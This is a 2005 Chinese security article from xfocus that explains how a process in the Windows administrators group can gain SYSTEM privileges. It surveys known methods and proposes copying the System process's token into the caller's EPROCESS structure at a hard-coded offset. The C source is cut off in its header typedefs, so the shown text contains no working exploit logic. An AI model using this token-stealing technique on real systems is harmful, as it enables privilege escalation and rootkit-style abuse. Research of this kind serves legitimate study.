📄 管理员组获取系统权限的完美解决方案.html
字号:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>管理员组获取系统权限的完美解决方案 </title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography," /><link rel="stylesheet" href="../../css/plone.css" type="text/css"></head><body bgcolor="#FFFFFF" text="#000000"><div class="top"> <div class="searchBox"> <form name="searchform" action="http://www.google.com/search" method="get"> <input type="hidden" name="domains" value="www.xfocus.net"> <input type="hidden" name="sitesearch" value="www.xfocus.net"> <input type="text" name="q" size="20"> <input type="submit" name="btnG" value="Google Search"> </form> </div> <img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo"> <img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title"></div><div class="tabs"> <a href="../../index.html" class="plain">首页</a> <a href="../../releases/index.html" class="plain">焦点原创</a> <a href="../../articles/index.html" class="selected">安全文摘</a> <a href="../../tools/index.html" class="plain">安全工具</a> <a href="../../vuls/index.html" class="plain">安全漏洞</a> <a href="../../projects/index.html" class="plain">焦点项目</a> <a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">焦点论坛</a> <a href="../../about/index.html" class="plain">关于我们</a></div><div class="personalBar"> <a href='https://www.xfocus.net/php/add_article.php'>添加文章</a> <a href='http://www.xfocus.org/'>English Version</a></div><table class="columns">
<tr>
<td class="left">
<div class="box">
<h5> 文章分类 </h5>
<div class="body">
<div class="content odd">
<div style="white-space: nowrap;">
<img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/4.html'><b>专题文章 <<</b></a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/2.html'>漏洞分析</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/3.html'>安全配置</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/1.html'>黑客教学</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/5.html'>编程技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/7.html'>工具介绍</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/6.html'>火墙技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/8.html'>入侵检测</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/9.html'>破解专题</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/11.html'>焦点公告</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/12.html'>焦点峰会</a><br>
</div>
</div>
</div>
</div>
<div class="box">
<h5> 文章推荐 </h5>
<div class="body">
<div class="content odd">
<img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200408/733.html'>补丁管理最佳安全实践之资产评估</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200404/689.html'>国内网络安全风险评估市场与技术操作</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200410/743.html'>协作的信息系统风险评估</a><br>
</div>
</div>
</div>
</td>
<td class="main">
<h1>管理员组获取系统权限的完美解决方案</h1><br>创建时间:2005-04-28<br>文章属性:原创<br>文章提交:<a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=35303'>suei8423</a> (suei8423_at_163.com)<br><br>管理员组获取系统权限的完美解决方案<br />
<br />
Author : ZwelL<br />
Blog : <a href='http://www.donews.net/zwell' target='_blank'>http://www.donews.net/zwell</a><br />
Date : 2005.4.28<br />
<br />
关于管理员组(administrators)获取系统(SYSTEM)权限的方法其实已经有很多种了.<br />
小四哥就提到了一些:"MSDN系列(3)--Administrator用户直接获取SYSTEM权限"和"远程线程注入版获取SYSTEM权限".<br />
这里,我先踩在前辈的肩上列一些可行的方法:<br />
<br />
1. "利用ZwCreateToken()自己创建一个SYSTEM令牌(Token)" <br />
2. HOOK掉创建进程的函数ZwCreateProcess(Ex),用winlogon ID 创建<br />
3. 远线程插入,插入线程到系统进程,创建一新进程<br />
<br />
这上面三种方法都是scz提到的,也存在一些问题.其实除此这外,我们还可以:<br />
4. 将程序做成服务,带参数运行新进程<br />
<br />
做为服务来讲就是SYSTEM了,再创建的进程也是SYSTEM权限.<br />
<br />
当然,这里我都不会用到上面提到的方法.因为网上都能找到现成的实现代码.而且考虑一些复杂性以及存在的一些问题都不是很好的解决方案.<br />
<br />
这里,我拿出两种新的方案来实现该功能:<br />
<br />
第一种方法.我们先来看一下系统是如何进行权限检测的,<br />
举个例子,在调用了OpenProcessToken,我们知道会进行权限的验证:<br />
OpenProcessToken->NtOpenProcessToken->PsOpenTokenOfProcess->PsReferencePrimaryToken->找到这一句Token = Process->Token;<br />
|->ObOpenObjectByPointer调用上面返回的TOKEN进行检查<br />
<br />
也就是说,系统在检测权限时仅仅通过从进程的EPROCESS结构种拿出Token项进行操作.因此我们不需要继续往ObOpenObjectByPointer里面跟进了。<br />
思路已经很明显:直接将System进程的Token拿过来,放到我们进程的Token位置。那么系统就认为我们是SYSTEM权限.<br />
而这时我们的进程创建的子进程也就是SYSTEM权限了。(以上分析过程请参考WINDOWS源代码...^_^)<br />
<br />
实现代码:<br />
===========================================================================================================<br />
#include<windows.h><br />
#include<stdio.h><br />
#include<Accctrl.h><br />
#include<Aclapi.h><br />
<br />
#define TOKEN_OFFSET 0xc8 //In windows 2003, it's 0xc8, if others' version, change it<br />
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)<br />
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)<br />
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)<br />
<br />
typedef LONG NTSTATUS;<br />
typedef struct _IO_STATUS_BLOCK<br />
{<br />
NTSTATUS Status;<br />
ULONG Information;<br />
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;<br />
<br />
typedef struct _UNICODE_STRING<br />
{<br />
USHORT Length;<br />
USHORT MaximumLength;<br />
PWSTR Buffer;<br />
} UNICODE_STRING, *PUNICODE_STRING;<br />
<br />
#define OBJ_INHERIT 0x00000002L<br />
#define OBJ_PERMANENT 0x00000010L<br />
#define OBJ_EXCLUSIVE 0x00000020L<br />
#define OBJ_CASE_INSENSITIVE 0x00000040L<br />
#define OBJ_OPENIF 0x00000080L<br />
#define OBJ_OPENLINK 0x00000100L<br />
#define OBJ_KERNEL_HANDLE 0x00000200L<br />
#define OBJ_VALID_ATTRIBUTES 0x000003F2L<br />
<br />
typedef struct _OBJECT_ATTRIBUTES<br />
{<br />
ULONG Length;<br />
HANDLE RootDirectory;<br />
PUNICODE_STRING ObjectName;<br />
ULONG Attributes;<br />
PVOID SecurityDescriptor;<br />
PVOID SecurityQualityOfService;<br />
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; <br />
<br />
typedef struct _SYSTEM_MODULE_INFORMATION<br />
{<br />
ULONG Reserved[2];<br />
PVOID Base;<br />
ULONG Size;<br />
ULONG Flags;<br />
USHORT Index;<br />
USHORT Unknown;<br />
USHORT LoadCount;<br />
USHORT ModuleNameOffset;<br />
CHAR ImageName[256];<br />
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;<br />
<br />
typedef enum _SYSTEM_INFORMATION_CLASS<br />
{<br />
SystemBasicInformation,<br />
SystemProcessorInformation,<br />
SystemPerformanceInformation,<br />
SystemTimeOfDayInformation,<br />
SystemNotImplemented1,<br />
SystemProcessesAndThreadsInformation,<br />
SystemCallCounts,<br />
SystemConfigurationInformation,<br />
SystemProcessorTimes,<br />
SystemGlobalFlag,<br />
SystemNotImplemented2,<br />
SystemModuleInformation,<br />
SystemLockInformation,<br />
SystemNotImplemented3,<br />
SystemNotImplemented4,<br />
SystemNotImplemented5,<br />
SystemHandleInformation,<br />
SystemObjectInformation,<br />
SystemPagefileInformation,<br />
SystemInstructionEmulationCounts,<br />
SystemInvalidInfoClass1,<br />
SystemCacheInformation,<br />
SystemPoolTagInformation,<br />
SystemProcessorStatistics,<br />
SystemDpcInformation,<br />
SystemNotImplemented6,<br />
SystemLoadImage,<br />
SystemUnloadImage,<br />
SystemTimeAdjustment,<br />
SystemNotImplemented7,<br />
SystemNotImplemented8,<br />
SystemNotImplemented9,<br />
SystemCrashDumpInformation,<br />
SystemExceptionInformation,<br />
SystemCrashDumpStateInformation,<br />
SystemKernelDebuggerInformation,<br />
SystemContextSwitchInformation,<br />
SystemRegistryQuotaInformation,<br />
SystemLoadAndCallImage,<br />
SystemPrioritySeparation,<br />
SystemNotImplemented10,<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -